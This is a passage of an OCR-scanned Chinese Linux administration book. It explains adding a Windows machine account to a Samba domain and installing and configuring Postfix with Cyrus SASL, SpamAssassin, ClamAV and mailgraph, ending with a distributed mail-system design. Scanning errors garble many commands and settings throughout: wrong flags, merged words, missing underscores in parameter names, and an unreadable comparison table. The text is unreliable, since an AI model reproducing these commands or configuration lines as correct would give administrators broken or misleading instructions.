在 添加 完 用 户 后 , 并 不 能 通过 一 台 Windows 计算 机 以 某 个 用 户 登录 到 域 中 , 因为 Windows 
计算 机 已 经 纳入 了 域 安 全 ， 所 以 还 需要 添加 相应 的 计算 机 账号 。 

和 普通 用 户 账 号 类 似 ， 需 要 先 将 一 台 计 算 机 名 加 入 到 LDAP 中 ， 让 Samba 认为 这 个 账号 
存在 于 Unix 系统 中 。 添 加 的 过 程 不 再 重复 ,注意 该 账号 应 以 “$” 符 号 结尾 ， 如 某 台 计算 机 主 
机 名 为 machinel， 那 么 需要 加 入 LDAP 的 账号 是 “machine1$”， 然 后 运行 命令 : 


#smbpasswd -m -a machinel 


以 上 命令 表示 添加 对 应 的 机 器 账号 。 注 意 ， 这 里 又 没有 “$” 符 号 了 ，Samba 会 自动 添加 
一 个 “$” 到 后 面 。 如 果 没 有 错误 提示 ， 说 明 添 加 成 功 。 

现在 ， 把 这 台 名 为 machinel 的 机 器 加 入 到 COMPANY.NET 域 中 。 在 Windows 2003 中 选 
择 “我 的 电脑 ”一 “属性 ”一 “网 络 标志 ”一 “属性 ”， 将 “隶属 于 ” 改 为 “ 域 ”， 并 输入 域 
名 COMPANY .NET。 这 时 会 提示 输入 有 权 加 入 到 域 中 的 账户 和 密码 ， 输 入 前 面 添加 的 root 用 
户 和 密码 。 如 果 没 有 意外 ,会 弹出 “欢迎 加 入 COMPANY.NET 域 ” 的 提示 。 看 到 这 样 的 提示 ， 
表示 已 经 成 功 了 。 最 后 ， 可 以 使 用 Tom 用 户 登录 ， 并 选择 登录 到 COMPANY.NET 域 ， 开 始 
自由 的 Windows Domain 之 旅 。 
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3.1 基于 Postfix 的 大 型 邮件 系统 


Postfix 是 目前 流行 的 一 套 邮 件 传输 代理 软件 (MTA) ， 其 作者 Wietse Venema 最 初 开发 
这 套 软 件 时 就 对 总 体 设 计 、 扩 展 能 力 、 可 用 性 及 系统 安全 等 方面 进行 了 充分 的 考虑 。 由 于 Postfix 
在 稳定 、 效 率 、 安 全 和 可 用 性 上 的 优势 ， 使 得 很 多 大 型 的 邮件 服务 提供 商都 从 原 有 的 MTA 软 
件 向 Postfix 过 渡 ， 而 新 近 诞 生 的 邮件 产品 也 大 多 采用 了 Postfix。 网 易 、Tom 和 新 浪 都 将 原来 
的 Qmail 更 换 为 Postfix， 可 见 Postfix 在 大 规模 邮件 系统 中 有 比较 普遍 的 应 用 。 当 然 ，Postfix 
也 完全 适用 设计 中 小 型 的 邮件 系统 ， 因 为 Postfix 在 保证 了 效率 、 安 全 、 扩 展 等 方面 优势 的 同 
时 ,， 还 具有 配置 简单 的 特点 。 如 何 选择 一 个 好 的 邮件 系统 ， 建 立 一 个 功能 强大 且 性 能 稳定 的 邮 
件 服务 器 成 为 企业 关注 的 问题 , 本 章 就 介绍 在 Red Hat AS 5.4 中 如 何 安装 和 配置 Postfix, 其 中 
涵盖 了 比较 基本 的 防范 垃圾 和 病毒 的 配置 、 管 理 等 工作 ， 使 大 家 领略 Postfix 系统 的 易 用 性 及 
其 强大 性 能 ， 最 后 介绍 如 何 利 用 Postfix 搭建 大 型 分 布 式 邮件 系统 。 


3.1.1 ”Postfix 与 其 他 MTA 的 对 比 


在 众多 的 MTA 软件 中 ， 最 有 影响 的 应 该 是 Sendmail、Qmail 和 Postfix。Sendmail 是 最 古 
老 的 MTA 之 一 ， 也 拥有 一 批 固定 的 使 用 者 ; Qmail 是 新 生 代 的 MTA 代表 ， 其 特点 是 速度 快 、 
体积 小 ， 并 且 容 易 配 置 安装 。Postfix 起 源 于 1996 年 ， 它 采用 模块 化 设计 ， 使 用 了 大 量 优秀 的 
技术 ， 以 达到 安全 高 效 的 目的 。Postfix 发 展 到 现在 已 经 成 为 功能 非常 丰富 、 扩 展 性 和 安全 性 
非常 强 的 优秀 MTA 软件 。 


1. Sendmail 


MTA 软件 的 很 多 先进 功能 都 是 在 Sendmail 上 最 先 实 现 的 。 但 Sendmail 也 有 典型 的 历史 
问题 ， 主 要 是 整个 程序 没有 实现 良好 的 模块 化 ， 运 行 时 需要 SID 权限 ， 以 及 配置 文件 复杂 难 
懂 。 这 些 是 阻碍 Sendmail 更 好 普及 应 用 的 一 些 客观 问题 。 


2. Qmail 


Qmail 是 新 生 代 的 MTA 代表 ， 实 现 了 模块 化 设计 ， 避 免 了 SID 问题， 基本 功能 齐全 ， 配 
置 较 Sendmail 简单 ， 而 且 用 户 也 很 广泛 。 但 Qmail 最 近 几 年 的 开发 工作 基本 停止 ,补丁 程序 
也 相对 零乱 , 这 些 都 是 长 期 使 用 Qmail 的 用 户 或 者 邮件 服务 提供 商 不 得 不 认真 考虑 的 问题 。 另 
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外 ，Qmail 的 扩展 性 并 不 是 很 好 ， 经 常 需要 通过 打 补 丁 的 方式 来 完成 功能 的 扩展 。 

3. Postfix 

Postfix 在 设计 上 可 以 说 是 最 为 优美 的 ， 其 实现 了 和 良好 的 模块 化 ， 邮 件 的 处 理 流程 通过 调 
用 各 个 功能 模块 来 完成 ， 在 效率 、 功 能 、 可 用 性 、 扩 展 及 安全 等 方面 都 考虑 得 比较 充分 。 

接 下 来 将 按 步骤 介绍 在 Red Hat AS 5 下 Postfix 的 安装 与 配置 ， 读 者 能 比较 充分 地 体会 到 
Postfix 的 易 用 性 。 表 3.1 对 比 了 Sendmail 与 Postfix、Qmail 的 一 些 特 点 。 


表 3.1 Sendmail 与 Postfix、Qmail 的 对 比 


模块 化 


五 
三 


Sendmail 兼容 性 
9 2 | 


MTA 
| Sendmail 
Postfix 


| 
3.1.2 基本 邮件 服务 器 的 搭建 


1. Postfix 的 安装 


(1) 停止 已 经 运行 的 MTA 并 使 之 失效 。 安 装 Postfix 之 前 ， 请 检查 是 否 有 其 他 MTA 程 
序 在 运行 ， 如 果 有 则 删除 系统 原 有 的 MTA， 或 者 停止 原 有 的 MTA， 并 禁止 initd 下 该 MTA 
的 启动 脚本 ， 避 免 重新 引导 的 时 候 再 次 启动 。 操 作 如 下 : 


[root@cecmail opt]# ps -ef | grep Sendmail 

root 1919 1 0 Mayl8 00:00:00 Sendmail: accepting connections 

smmsp 1927 1 0 Mayl8 00:00:00 Sendmail: Queue runner@01:00:00 for 
/var/spool/clientmqueue 

root 9014 8835 0 22:14 pts/3 00:00:00 grep Sendmail 


显示 的 信息 说 明 系 统 正在 运行 Sendmail， 可 以 直接 删除 Sendmail。 操 作 如 下 : 


#killall sendmail 
Sendmail: no process killed 


[root@cecmail ]# rpm -e Sendmail --nodeps 
(2) 添加 组 用 户 ， 操 作 如 下 : 


[root@cecmail opt]# groupadd Postfix 

[root@cecmail opt]# groupadd postdrop 

[root@cecmail opt]# cat /etc/group 

mysql:x:500: www:x:501: luanzhaodong:x:502: Postfix:x:503: postdrop:x:504: 


通过 查看 Group 文件 ， 可 以 判断 添加 组 是 否 成 功 。 
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(3) 添加 Postfix 用 户 。 操 作 如 下 : 


[root@cecmail opt]#useradd Postfix -g Postfix -C "Postfix user" -d /dev/null 
-s /sbin/nologin 
[root@cecmail opt]#cat /etc/passwd mysql:x:500:500::/home/mysql:/bin/bash 
www:x:501:501::/home/www:/bin/bash 
Postfix:x:502:503:Postfix user:/dev/null:/sbin/nologin 


通过 查看 passwd 文件 ， 可 以 判断 添加 用 户 是 否 成 功 。 


(4) 到 Postfix 的 官方 网 站 (http:/www.postfix.org/) 下 载 Postfix 源码 文件 ， 并 复制 到 服 
务 器 的 某 个 目录 下 ， 如 可 以 下 载 到 /opt/postfix 目录 。 操 作 如 下 : 


[root@cecmail Postfix-2.6.5]# mkdir /opt/postfix/ 
[root@cecmail Postfix-2.6.5]# /opt/postfix/ 
[root@cecmail Postfix-2.6.5]# tar xzvf Postfix-2.6.5.tar.gz 


(5) 编译 安装 Postfix， 操 作 如 下 : 


[root@cecmail Postfix-2.6.5]# cd Postfix-2.6.5 

[root@cecmail Postfix-2.6.5]#make = 下 Makefile.init makefiles 
'CCARGS=-DHAS MYSQL -I/usr/include/mysql -DUSE_TLS -DUSE_ SASL AUTH 
-I/usr/include/sasl' 'AUXLIBS=-L/usr/lib/mysql -lmysqlclient -1z -lm -L/usr/lib 
Ess “Terypto -Lsasl2, 


查看 Makefile 文件 是 否 成 功 生 成 : 


[root@cecmail Postfix-2.6.5]# ls Makefile 
Makefile 


上 面 的 代码 说 明 Makefile 文件 已 经 生成 。 可 以 进行 编译 及 安装 了 : 


[root@cecmail Postfix-2.6.5]# make 


[root@cecmail Postfix-2.6.5]# make install 


安装 时 系统 会 提示 用 户 输入 一 些 参 数 ， 如 队列 文件 的 路 径 、 用 户 和 组 信息 等 , 但是， 安装 
程序 本 身 会 提供 默认 的 参数 。 一 般 情况 下 , 不 需要 手动 修改 这 些 默 认 参 数 , 直接 按 回 车 键 即 可 。 
这 样 ，Postfix 就 安装 成 功 了 。 


2. Postfix 配置 与 运行 
(1) 编辑 main.cf 


在 启动 Postfix 之 前 ， 需 要 简单 地 配置 一 下 Postfix。Postfix 的 主要 配置 文件 是 
/etc/Postfix/main.cf， 为 了 实现 最 简单 的 功能 ， 只 需 修改 以 下 几 个 参数 即 可 : 


mydomain 


Linux ”企业 应 用 案例 精 解 


该 参数 指明 域名 ， 在 这 里 指定 : 


mydomain = cec-cn.com 


myorigin 


myorigin 参数 指明 发 件 人 所 在 的 域名 。 如 果 用 户 的 邮件 地 址 为 user@domain.com， 那 么 该 
参数 指定 @ 后 面 的 域名 。 这 个 参数 通常 这 样 设置 : 


myorigin = $mydomain 


mydestination 
mydestination 参数 指定 Postfix 接收 邮件 时 收 件 人 的 域名 。 简 单 地 说 ， 也 就 是 Postfix 系统 


要 接收 什么 样 的 邮件 ， 一 般 只 希望 接受 发 给 自己 这 个 域名 的 邮件 ， 所 以 ， 通 常 mydestination 
与 myorigin 一 样 : 

mydestination = $mydomain 

mynetworks 参数 可 以 定义 为 使 用 此 SMTP 服务 器 发 信 的 客户 IP 地 址 ， 一 般 设置 为 本 机 ， 
或 者 本 公司 IP 段 ， 例 如 : 


mynetworks = 192.168.1.0/24 


myhostname 


myhostname 参数 用 于 描述 运行 C-Link 系统 的 服务 器 所 符合 规则 的 域名 全 称 。 
可 以 在 sh 下 运行 以 下 命令 查看 域名 : 


[root@cecmail Postfix-2.6.5]# hostname Cecmail 
按照 下 面 的 内 容 来 配置 main.cf 文件 : 


myhostname = cecmail 

mydomain = cec-cn.com 

myorigin = $mydomain 

mydestination = $myhostname, localhost.$mydomain, localhost, 
$mydomain 

mynetworks = 192.168.1.0/24, 127.0.0.0/8 


(2) 运行 Postfix， 操 作 如 下 : 


[root@cecmail Postfix-2.6.5]#/opt/Postfix/Postfix-2.6.5/bin/Postfix start 


Postfix/Postfix-script: starting the Postfix mail system 
如 果 安 装 的 是 postfix 的 rpm 包 ， 则 


#service postfix start 
starting postfix: [确定 ] 


#service dovecot start 
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启动 Dovecot Imap: [确定 ] 
(G3) 测试 MTA， 操 作 如 下 : 


[root@cecmail Postfix-2.6.5]# telnet localhost 25 

Trying 127.0.0.1..。 Connected to localhost.localdomain (127.0.0.1). 
Escape character is '^]'. 

220 cecmail ESMTP Postfix (2.6.5)---- 说 明 连 接 成 功 


helo cec-cn-com # 向 服务 器 标识 用 户 身份 # 

mail from: # 标 明 发 信人 地 址 # 

250 ok # 命 令 执 行 成 功 # 

TepEt Tos # 邮 件 投递 地 址 test28@cec-cn .com# 
250 ok # 命 令 执行 成 功 # 

data # 数 据 传输 初始 化 # 

354 End data with . # 开 始 传输 数据 # 


From: testl@aaa.com 

To: test2@cec-cn.com 

Subject: test mail 

Hi, this is a test . # 数 据 内 容 ， 包 括 BASE64 加 密 后 的 邮件 内 容 ， 以 
CRLF .CRLEF 结束 数据 传输 # 

250 OK: queued as 2F6DE3929 # 命 令 执 行 成 功 # 

Quit # 结 束 会 话 # 

221 Bye Connection closed by foreign host. # 断 开 连 接 # 


(4) SMTP 认证 的 配置 目前 ， 比 较 常 用 的 SMTP 认证 机 制 是 通过 CyrusSASL 包 来 实现 。 
CyrusSASL 是 Cyrus Simple Authenticationand Security Layer 的 缩写 , 它 主 要 的 功能 是 为 应 用 程 
序 提供 了 认证 函数 库 。 下 面 讲述 CyrusSASL 的 安装 配置 。 


加 Cyms-SASL 认证 包 的 安装 : 


[root@rhel4postfix]#rpm-qalgrepsasl 
cyrus~sasl-mdS5-201.19-5.EL4 
cyrus-sasl-devel-2.1.19-5.EL4 
cyrus-sasl-2.1.19-5.EL4 
cyrus-sasl-gssapi-2.1.19-5.EL4 
cyrus-sasl-plain-2.1.19-5.EL4 
cyrus-sasl-ntlm-2.1.19-5.EL4 
CVIUS -Sasl-sql-2610619-5.EL4 


圆 cyms-SASLV2 的 密码 验证 机 制 : 


[rooterhe14postfix]#saslauthd-V 
saslauthd2.1.19 
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authenticationmechanisms:getpwentkerberos5pamrimapshadowldap 
#vi/etc/sysconfig/saslauthd 


MECH=shadow \\ 确 认 采 用 的 密码 机 制 为 shadow 
加 Cyms-SASLV?2 的 认证 功能 : 


#psaux1grepsaslauthd 查看 saslauthd 进程 ， 如 果 没 有 发 现 些 进程 ， 则 要 开启 : 
#/etc/rc.d/init.d/saslauthdstart 

#chkconfigsaslauthdon 
#/usr/sbin/testsaslauthd-unetseek-p'52netseek" 

0:OK"Success." \\ 认 证 生效 


通过 以 上 操作 Postfix 就 可 以 运行 了 。 但 是 ，Postfix 到 底 是 怎样 处 理 邮 件 的 呢 ? Postfix 的 
各 个 模块 如 何 对 邮件 处 理 流程 产生 作用 的 呢 ? 下 面 就 从 Postfix 的 机 制 上 分 析 这 些 问 题 。 


3.1.3 ”Postfix 常见 问题 


问 : Postfix 中 如 何 让 修改 后 的 配置 生效 ? 
答 : 以 root 用 户 身份 执行 Postfix 的 reload 命令 即 可 。 


问 : 使 用 Postfix 如 何 刷新 邮件 队列 ? 
答 : 以 root 用 户 身份 执行 Postfix 的 ftush 命令 即 可 。 


问 : 如 何 让 Postfix 开机 后 自己 运行 ， 而 不 必 手动 启 动 ? 
可 以 通过 ntsysv 工具 ， 选 中 Postfix 即 可 。 


问 : 如 何 设 置 Postfix 的 队列 延迟 ? 
答 : 可 以 在 Postfix 的 主要 配置 文件 /etc/postifx/main.cf 中 修改 下 列 参数 。 


@ queue_ run delay ( 默认 值 1000 秒 ) : 设置 多 长 时 间 队 列 管理 进程 去 扫描 无 法 投递 的 
邮件 。 

@ Maximal queue lifetime (默认 值 5 天 ) : 设置 邮件 在 队列 里 的 最 长 时 间 。 

@ Minimal backoff time (默认 值 1000 秒 ) : 在 这 个 时 间 内 ， 邮 件 不 能 够 被 锁定 。 

@ Maximal backoff time (默认 值 4000 秒 ) : 在 这 个 时 间 之 后 ， 如 果 邮 件 仍 然 没有 被 投 
递 ， 就 认为 是 无 法 投递 。 

@ qmgr message recipient_ limit ( 默认 值 1000) 。 


只 


问 : 如 何 禁止 Postfix 对 客户 端 他 做 反 向 域名 解析 ? 
答 : 以 root 用 户 身 份 登录 并 运行 如 下 命令 : 


postconf -e disable client dns lookup = 1 


postfix reload 


问 : Postfix 如 何 设置 取消 Delivered-To 头 部 信息 ? 
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答 : 在 main.cf 中 进行 如 下 设置 : 


smtpd recipient restrictions = ... regexp:/etc/postfix/access regexp ... 
smtpd recipient restrictions = ... pcre:/etc/postfix/access regexp ... 
/etc/postfix/access regexp: /^(.*)-outgoing@(.*)/ 554 Use $1@$2 instead 


prepend delivered header 


配置 参数 也 控制 Delivered-To 的 使 用 ， 默 认 的 设置 是 command、file、forward( 在 把 信件 
发 送 给 命令 、 发 送 给 文件 或 者 转发 的 时 候 使 用 Delivered-To) 。 不 推荐 在 转发 邮件 的 情况 下 取 
消 Delivered-To 头 部 信息 。 

问 : 如 何 让 Postfix 支持 maildir? 

答 : 在 main.cf 中 设置 : 


home mailbox = Maildir/ 


任何 相对 路 径 末 尾 加 上 “/” 号 都 表示 打开 了 maildir 支持 ，home_mailbox 设置 的 值 将 会 追 
加 到 用 户 的 home 目录 ， 也 就 是 如 果 指 定 home_mailbox = mymail/， 那 么 Postfix 也 认为 打开 了 
maildir 支持 ， 并 把 信件 投递 到 用 户 home 目录 下 的 mymail 目录 中 。 

问 : Postfix 如 何 设 置 发 送 邮件 延迟 通知 ? 

答 : 在 main.cf 中 设置 : delay_waming time=4。 


问 : 如 何 增加 Postfix 的 进程 数 ? 
答 : 该 设置 依赖 于 内 核 版 本 : 要 在 引导 的 时 候 修改 参数 ， 例 如 代码 : 


fs.file-max = 16384 kernel.threads-max = 2048 


问 : 如 何在 拨号 环境 下 使 用 Postfix? 
答 : 在 main.cf 中 做 如 下 设置 : 


relayhost = smtprelay.yourisp.com 
defer transports = smtp 


disable dns_ lookups = yes 
并 在 拨号 脚本 中 加 入 : 
/usr/sbin/sendmail -q 


问 : 如 何 拒 收 附件 为 某 些 扩展 名 的 邮件 ? 
答 : 创建 body_checks 文件 内 容 如 下 : 


#vi/etc/postfix/body checks /^((Content- (Disposition: attachment; |Type:).*|\+)]| 
*) (file) ?name\*=\ *"?.*\. (lnklasd|lhlplocx|lreglbatlc[ho]lm|lcmdlexeldll|vxd|lpifl|scrlhtal 
jse?|sh[mbs] |vb [esx] |ws[fh] |wmf)"?\ *$/ REJECT attachment type not allowed 
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3.1.4 ”Postfix 的 反 垃圾 配置 


SpamAssassin 是 目前 成 功 的 反 垃圾 框架 ， 它 是 利用 Perl 的 字符 串 处 理 来 实现 垃圾 邮件 判 
别 的 。 通 过 判断 目标 邮件 是 否 符合 SpamAssassin 的 规则 配置 文件 中 的 各 项 规则 ， 并 给 邮件 进 
行 评分 ，SpamAssassin 就 会 告诉 用 户 哪些 邮件 是 垃圾 邮件 。 而 用 户 需要 做 的 只 是 配置 
SpamAssassin 的 规则 集 ， 以 及 评分 标准 。 

安装 SpamAssassin 十 分 简单 ， 请 参考 以 下 步 又: 


下 载 SpamAssassin 。 
贺 解压 缩 Mail-SpamAssassin-3.2.5.tar.gz。 
辆 利用 如 下 命令 编译 安装 : 


#perl Makefile.PL 


#make 


#make install SpamAssassin 


安装 完毕 后 ,就 可 以 开始 配置 SpamAssassin 的 local.cf 文件 了 ，SpamAssassin 通过 这 个 配 
置 文件 来 设置 规则 ， 并 进行 垃圾 邮件 评判 。 如 果 想 仔细 了 解 SpamAssassin 的 规则 配置 ， 可 以 
访问 http://spamassassin.apache.org。 当 然 ， 简 单 地 配置 该 文件 ， 也 会 起 到 一 定 的 反 垃 圾 效果 ， 
可 以 进行 如 下 修改 。 


@ 设置 垃圾 邮件 的 评分 标准 ， 超 过 该 评分 即 被 判别 为 垃圾 邮件 : 
required hits 5.0 


@ 用 户 可 根据 自己 的 需要 配置 白 名单 ， 如 果 认 为 来 自 本 域 (本 书 中 设 定 的 本 域 是 test) 
的 都 是 安全 邮件 ， 那 么 就 可 以 进行 如 下 修改 : 


whitelist from *Q@cec-cn.com 

@ 在 垃圾 邮件 的 主体 上 做 一 个 标记 : 
rewrite subject 1 

@ 处 理 垃圾 邮件 的 方式 有 如 下 三 种 。 


@ 0: 将 信息 写 入 邮件 头 。 

@ 1: 将 垃圾 邮件 作为 附件 。 

@ 2: 垃圾 邮件 以 正文 形式 存在 。 
report safe 0 

@ 是 否 使 用 贝 叶 斯 运算 : 


use bayes 1 


@ 贝 叶 斯 的 存储 信息 ， 根 据 用 户 自己 的 实际 情况 而 定 : 
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bayes path /var/lib/amavis/.spamassassin/bayes 

@ 是 否 启 用 贝 叶 斯 的 自动 学 习 : 

auto learn 1 

是 否 略 过 实时 黑 名 单 的 检查 : 

skip rbl checks 0 

@ 检查 是 否 是 本 域 发 送 的 邮件 ， 如 果 是 ， 则 认为 是 正常 邮件 ， 评 分 减 去 50: 


header LOCAL RCVD Received =~ /.*\(\S+\.test\.com\s+\[.*\]\)/ 
describe LOCAL RCVD Received from local machine score LOCAL RCVD -50 


配置 好 的 SpamAssassin 完全 可 以 由 Postfix 直接 调用 。 但 是 ， 如 果 以 服务 的 形式 启动 ， 即 
spamd 的 形式 ， 则 可 以 有 效 地 降低 服务 器 的 资源 占用 率 。 

修改 /etc/default/SpamAssassin, 将 ENABLED 设 为 1, 这样 SpamAssassin 才 可 以 spamd 的 
形式 启动 。 然 后 ， 还 需要 修改 /etc/postfix/master.cf， 用 于 通知 Postfix 去 使 用 SpamAssassin 来 
扫描 邮件 : 


Smtp inetn-n- - smtpd -v -o 


content filter=spamassassin 


这 样 ， 重 新 启动 smtpd 和 Postfix 守护 进程 后 ， 将 启用 SpamAssassin 来 进行 垃圾 邮件 
到 扫描 。 


3.1.5 ”Postfix 的 反 病 毒 配 置 


Postfix 可 以 运用 Clamav 来 扫描 邮件 ，Clamav 是 一 款 免 费 的 反 病毒 工具 包 ， 十 分 有 效 。 
大 家 也 可 以 安装 F-Prot Antivirus 软件 。 
下 面 以 Clamav 为 例 〈 最 新 版 下 载 地 址 为 http://www.clamav.net/) ， 进 行 如 下 操作 : 


下 载 clamav-0.95.tar.gz。 
贺 解压 缩 clamav-0.95.tar.gz。 
国 利用 如 下 命令 添加 用 户 : 


#groupadd clamav 


#useradd -g clamav -s/bin/false -d/dev/null clamav 


四 利用 如 下 命令 编译 安装 : 


#./configure --prefix=/usr/local/clamav --with-dbdir=/usr/local/share/clamav 
#make 


#make check 


打开 /usr/local/clamav/etc/clamd.conf， 注 释 掉 Example 行 ， 并 进行 如 下 配置 : 


四 打开 /sr/local/clamav/etc/freshclam.conf， 注 释 掉 Example 行 ， 并 使 用 如 下 命令 进行 配 


四 使 用 如 下 命令 创建 日 志文 件 夹 ， 并 设置 权限 : 


编辑 crontab， 并 设置 自动 更 新 病毒 库 : 


基于 Postfix 的 大 型 邮件 系统 案例 第 3 党 


#crontab -e 0 4 * * * root /usr/local/clamav/bin/freshclam --quiet -1 


/var/log/clamd.1log 
贺 启动 Clamav， 效 果 如 图 3.1 所 示 : 


#/usr/local/clamav/sbin/clamd 


Ble View Options Quarantine Help 
全 人 Qld 
Information 


[he 


Status 
Files Scanned; 1 


口 ClamTk Virus Scanner 


Scanning complete (367750 signatures) 
Status 


Viruses Found: 0 


四 加 可 


Ready 


图 3.1 启动 Clamav 后 的 效果 


病毒 检测 : 


从 网 站 http://www.eicar.gor/anti_ anti_virus_test_file.htm 下 载 测 试 病毒 文件 


eicar.com， 再 编写 一 个 邮件 并 在 附件 中 带 上 eicar.com， 这 样 就 可 以 检验 防 病毒 系统 的 作用 了 。 


这 样 ，Clamav 就 可 以 根据 病毒 库 信息 对 邮件 进行 扫描 了 。 当 然 ， 为 了 让 Postfix 能 够 运用 
Clamav 去 扫描 邮件 , 实际 上 还 需要 安装 Amavisd, 这 是 比较 常用 的 MTA 和 邮件 扫描 软件 的 一 
个 接口 软件 , 使 用 该 软件 可 以 让 MTA 方便 地 启用 邮件 扫描 程序 。 安 装 Amavisd 的 方法 请 参考 


有 关 资 料 ， 这 里 不 再 资 述 。 


3.1.6 ”自动 监控 Postfix 邮件 服务 器 


这 个 功能 用 于 增强 Postfix 的 管理 性 ， 可 以 自动 监控 Postfix 的 日 志文 件 。 
加 下 载 mailgraph-1.14.tar.gz 并 安装 。 修 改 配 置 文件 /etc/init.d/mailgraph， 并 修改 启 


动 程序 权限 : 


#chmod 755 /etc/ini.d/mailgraph 
#chkconfig -levels 235 mailgraph on 
#/etc/init.d/mailgraph start 


加 移动 CGI 和 脚本: 


#mv mailgraph.cgi /var/www/your IP/cgi-bin/ 


国 修改 CGI 脚本 : 
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My S$rrd=`/var/lib/mailgraph.rrd; #RRD 数据 库 路 径 
My S$rrd virus=` /var/1Iib/mailgraph virus.rrd’; #Virus RD 数据 库 路 径 


修改 CGI 权限 : 

#chmod 755 /var/ww/www.example.cm/cgi-bin/mailgraph.cgi 

贺 浏览 日 志 网 页 http://ip/cgi-bin/mailgraph.cgi， 如 图 3.2 所 示 。 
aoo 
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图 3.2 mailgraph 界面 


3.2 ”搭建 分 布 式 的 邮件 系统 


对 于 大 型 邮件 系统 , 实现 用 户 的 分 布 是 不 得 不 考虑 的 事情 。 因 为 , 集中 存储 的 硬件 成 本 比 
较 高 。 比 如 ， 网 易 的 电子 邮件 注册 用 户 超过 5 亿 ， 新 浪 免费 邮件 的 用 户 也 超过 1.1 亿 ，Gmail 
扩容 的 动作 也 迫使 其 他 邮件 服务 提供 商 扩大 自己 的 容量 ， 集 中 存储 的 成 本 也 因此 变 得 更 加 昂 
贵 。 而 将 用 户 分 布 在 不 同 的 邮件 服务 器 上 , 并 利用 大 容量 而 且 相 对 廉价 的 磁盘 阵列 来 存储 用 户 
邮件 的 做 法 ， 则 能 显著 降低 成 本 ， 并 能 在 一 定 程度 上 解决 集中 存储 的 单 点 故障 问题 。 


3.2.1 搭建 分 布 式 邮 件 系 统 的 架构 设计 


利用 Postfix 搭建 分 布 式 的 邮件 系统 的 架构 如 图 3.3 所 示 。 邮 件 接收 服务 器 部 署 在 架构 的 
最 外 层 ， 负 责 接收 外 部 其 他 服务 器 的 发 信 请 求 ， 并 将 接收 到 的 邮件 转发 到 用 户 邮件 服务 器 上 。 
邮件 接收 服务 器 不 对 外 发 出 请 求 。 有 效 配置 邮件 接收 服务 器 上 的 Postfix， 就 能 实现 邮件 的 接 
收 和 转发 。 有些 人 实现 邮件 转发 是 通过 虚拟 投递 代理 和 虚拟 别名 来 实现 的 , 但是， 本 小 节 将 介 
绍 一 种 扩展 性 和 灵活 性 更 好 的 方法 来 实现 邮件 转发 。 在 用 户 邮件 服务 器 上 部 团 MDA、MUA， 
可 以 配置 Postfix 让 其 只 接收 邮件 接收 服务 器 和 其 他 用 户 邮件 服务 器 的 请 求 。 用 户 发 送 邮 件 时 
通过 用 户 邮件 服务 器 上 Postfix 的 Sendmail 向 外 部 其 他 服务 器 提出 发 信 的 请 求 。 
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郎 件 接收 服务 器 


用 户 屿 件 用 务 器 用 户 
图 3.3 ”Postfix 搭建 分 布 式 邮件 系统 架构 图 


3.2.2 ”邮件 接收 服务 器 的 配置 与 设计 


这 里 的 邮件 接收 服务 器 是 本 网 域 MX 记录 所 指向 的 服务 器 , MTA 通过 SMTP 协议 进行 邮 
件 传输 时 , 实际 上 就 是 通过 DNS 的 MX 记录 来 找到 邮件 接收 服务 器 的 。 对 于 大 型 的 邮件 系统 ， 
往往 需要 由 一 组 服务 器 构成 。 邮 件 接收 服务 器 接收 其 他 MTA 邮件 的 流程 为 : 接收 服务 器 接收 
邮件 一 查询 用 户 注册 在 哪 一 台 用 户 邮件 服务 器 一 将 邮件 转发 到 用 户 邮 件 服务 器 的 MTA。 那 么 
当 接收 服务 器 收 到 邮件 后 ， 如 何 执行 查询 动作 和 转发 动作 呢 ? 这 个 问题 可 以 通过 Postfix 提供 
的 强大 的 配置 文件 来 解决 。 在 main.cf 中 有 两 个 重要 的 配置 参数 在 大 型 的 分 布 式 邮件 系统 中 起 
到 了 非常 重要 的 作用 : 一 个 是 local recipient maps; 另 一 个 是 transport maps 。 
local_recipient_maps 参数 值 由 SMTP 服务 使 用 ， 当 邮件 接收 服务 器 收 到 新 邮件 时 , 它 会 检查 该 
参数 指定 的 查询 表 确 定 是 否 接收 该 邮件 , 这 里 的 查询 表 可 以 是 键 值 型 的 索引 表 , 也 可 以 是 查询 
程序 。 如 可 以 这 样 配置 main.cf: 


local recipient maps = usersever:smtpcheck 


发 送 方 MTA 发 出 RCPT 指令 时 ， 如果 接 收服 务 器 上 的 Postfix, 就 可 以 调用 smtpcheck 
对 应 的 程序 去 确认 该 用 户 是 否 存在 。 如 果 存 在 ,就 开始 准备 接收 DATA 指令 发 过 来 的 邮件 
正文 。 那 么 成 功 收 到 邮件 后 ， 如 何 实现 转发 呢 ? 这 就 需要 配置 transport_maps 这 个 参数 。 
Postfix 中 可 以 通过 transport_maps 这 个 参数 对 应 的 查询 表 来 判断 如 何 处 理 邮件 ， 继 而 修改 
默认 的 邮件 投递 流程 ， 这 里 的 查询 表 可 以 是 键 值 型 的 索引 表 ， 也 可 以 是 查询 程序 。 如 可 以 
这 样 配 置 main.cf: 


transport maps = usersever:transportmx 
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Postfix 可 以 通过 transportmx 对 应 的 程序 获得 下 一 步 处 理 邮件 的 指令 。 如 输入 收 件 人 邮件 
地 址 user2 @cec-cn.com, 输出 smtp: usersever06.cec-cn.com, 这 就 会 让 Postfix 通过 SMTP 把 信 
转投 到 usersever 06.cec-cn.com 域名 的 机 器 上 ， 也 就 是 第 6 台 用 户 邮 件 服务 器 。 


3.2.3 ”用户 邮 件 服务 器 的 配置 与 设计 


邮件 系统 中 的 用 户 在 注册 时 被 分 配 到 不 同 的 服务 器 上 ， 并 在 数据 库 中 记录 这 些 信息 。 
这 些 服务 器 负责 接收 从 邮件 接收 服务 器 转投 过 来 的 信件 ， 并 最 终 放 入 存储 系统 中 。 这 里 邮 
件 的 处 理 流程 为 : 用 户 邮件 服务 器 上 的 MTA 接收 邮件 一 查询 用 户 在 邮件 服务 器 上 的 存储 
位 置 一 存储 邮件 至 用 户 路 径 。 

在 这 里 ， 同 样 会 使 用 local_recipient_ maps 来 检查 收 件 人 是 否 真实 存在 。 但 与 邮件 接收 服 
务 器 不 同 的 是 ， 这 是 信件 的 最 终 目 的 地 ，transport maps 查询 的 结果 不 能 再 是 smtp: 
usersever06.cec-cn.com， 要 设置 成 合适 的 本 地 处 理 程序 ， 如 local 或 者 指定 mda 的 名 称 〈 在 
etc/master.cf 中 设置 ) 等 。main.cf 的 主要 配置 为 : 


local recipient maps = userserver:smtpcheck 


transport maps = usersever:transportusersever 


这 样 ， 一 个 大 型 的 分 布 式 邮件 系统 的 MTA 框架 就 搭建 成 功 了 ， 在 用 户 邮件 服务 器 上 部 署 
MUA， 用 户 可 以 进行 阅读 收 信 及 发 送 邮件 等 操作 了 。 

